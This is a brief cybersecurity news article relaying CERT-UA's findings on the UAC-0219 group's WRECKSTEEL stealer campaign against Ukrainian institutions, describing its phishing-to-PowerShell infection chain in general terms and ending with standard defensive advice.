The Ukrainian Computer Emergency Response Team (CERT-UA) has identified a series of cyberattacks attributed to the hacking group UAC-0219.
These attacks, ongoing since late 2024, utilize a sophisticated PowerShell-based malware tool known as “WRECKSTEEL” to exfiltrate sensitive data from compromised systems.
The primary targets include government agencies and critical infrastructure entities in Ukraine.
Attack Methodology and Tools
The UAC-0219 group employs a multi-stage infection process to execute their malicious campaigns.
The attack begins with phishing emails containing links to public file-sharing platforms such as DropMeFiles and Google Drive.
These links, sometimes embedded in PDF attachments, lead victims to download a VBScript loader disguised with a “.js” extension.
Once executed, the loader downloads and runs a PowerShell script, which is the core component of the WRECKSTEEL malware.
The PowerShell script is designed to search for and exfiltrate files with specific extensions, including documents, spreadsheets, presentations, images, and PDFs (*.docx, *.xlsx, *.pptx, *.jpg).
Additionally, it captures screenshots of the infected system and uploads all collected data to attacker-controlled servers using the cURL utility.
This functionality enables UAC-0219 to gather intelligence on high-value targets efficiently.
Evolution of Tactics
CERT-UA’s analysis indicates that UAC-0219 has been refining its tools and techniques over time. In 2024, the group relied on executable files created with the NSIS installer.
These files contained decoy documents (e.g., PDFs or images), VBScript-based stealers, and third-party software like “IrfanView” for screenshot capture.
However, starting in 2025, the group transitioned to using PowerShell exclusively for both data theft and screenshot functionality, streamlining their operations and reducing detection risks.
According to the Report, The WRECKSTEEL malware exists in multiple versions written in VBScript and PowerShell, underscoring its adaptability.
The use of compromised accounts to distribute phishing emails further complicates attribution and mitigation efforts.
CERT-UA urges all organizations to remain vigilant against this threat. Indicators of compromise (IOCs), including file hashes and malicious URLs used by UAC-0219, have been shared publicly to aid detection efforts.
If signs of compromise are detected, CERT-UA recommends immediate reporting to facilitate incident response and containment measures.
This campaign highlights the persistent threat posed by cyber espionage groups targeting critical sectors.
Organizations are advised to implement robust email filtering mechanisms, regularly update software systems, and train staff on recognizing phishing attempts to mitigate such risks effectively.
Find this Story Interesting! Follow us on LinkedIn, and X to Get More Instant Updates
 has identified a series of cyberattacks attributed to the hacking group UAC-0219.){kind=link}